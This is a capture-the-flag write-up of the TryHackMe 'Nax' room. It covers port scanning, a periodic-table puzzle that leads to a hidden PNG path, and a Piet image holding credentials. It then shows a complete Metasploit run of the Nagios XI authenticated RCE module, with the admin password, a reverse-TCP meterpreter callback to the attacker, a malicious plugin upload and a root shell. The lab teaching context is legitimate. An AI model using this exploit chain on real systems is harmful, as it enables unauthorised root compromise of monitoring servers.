Overpass3

Identify the critical security flaw in the most powerful and trusted network monitoring software on the market, that allows an user authenticated execute remote code execution.

This is Nax from THM. It’s medium rated and somewhat guided.

Ports

PORT STATE SERVICE

  1. 22/tcp open ssh
  2. 25/tcp open smtp
  3. 80/tcp open http
  4. 389/tcp open ldap
  5. 443/tcp open https
  6. 5667/tcp open unknown

389 is LDAP, 25 is Postfix SMTP and 5667 is unknown, but it doesn’t matter anyway.

HTTP

On the frontpage we got some ASCII art and this message:

Welcome to elements.
Ag - Hg - Ta - Sb - Po - Pd - Hg - Pt - Lr

Being a past chemistry nerd, I recognised that I could get the atomic numbers for these elements from a periodic table:

47 80 73 51 84 46 80 78 103

And sending that to CyberChef we can decode it to:

/PI3T.PNg

Sure enough, there is a PNG file called /PI3T.PNg with the artist being Piet Mondrian according to exiftool. Since Piet Mondrian was an artist who died in 1944, we can be pretty bloody sure he didn’t create this PNG; moreover it has an appearance vaguely reminiscent of his work but it’s not the same. Where does that leave us?

Well, we are after an authenticated RCE method so we need to be ‘given’ some credentials. I guessed (rightly) that this was some sort of Stego challenge, which I hate. After trying a few basic methods suitable for a PNG (strings, exiftool, foremost, binwalk) I searched for a writeup to find out what precise flavour of bs this was.

Piet

It turns out that it is piet, which is actually a programming language rather than a steganography technique per se. Anyway people were solving it at this website, but I tried it and it didn’t work. So rather than mess about with stego nonsense, I just grabbed the creds and moved on.

Later, I researched piet a little more and downloaded a python script that is supposed to be able to interpret the images. I had to install pygubu and then ran it; it threw a TypeError:

TypeError: ‘numpy.uint8’ object is not iterable

Yeah, screw piet.

Exploit

Metasploit baby! Haven’t had one of those for a while:

msf6 exploit(linux/http/nagios_xi_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_authenticated_rce):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   PASSWORD   n3p3UQ&9BjLp4$7uhWdY  yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.40.124          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                    yes       The target port (TCP)
   SRVHOST    10.9.10.123           yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                     yes       Base path to NagiosXI
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin           yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.9.10.123      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


msf6 exploit(linux/http/nagios_xi_authenticated_rce) > run

[*] Started reverse TCP handler on 10.9.10.123:4444 
[*] Found Nagios XI application with version 5.5.6.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting for the plugin to request the final payload...
[*] Sending stage (3008420 bytes) to 10.10.40.124
[*] Meterpreter session 1 opened (10.9.10.123:4444 -> 10.10.40.124:44212) at 2021-01-15 06:07:04 -0500
[*] Deleting malicious 'check_ping' plugin...
[!] Failed to delete the malicious 'check_ping' plugin: Connection failed. Manual cleanup is required.

meterpreter > shell
Process 23296 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)

Okey dokey.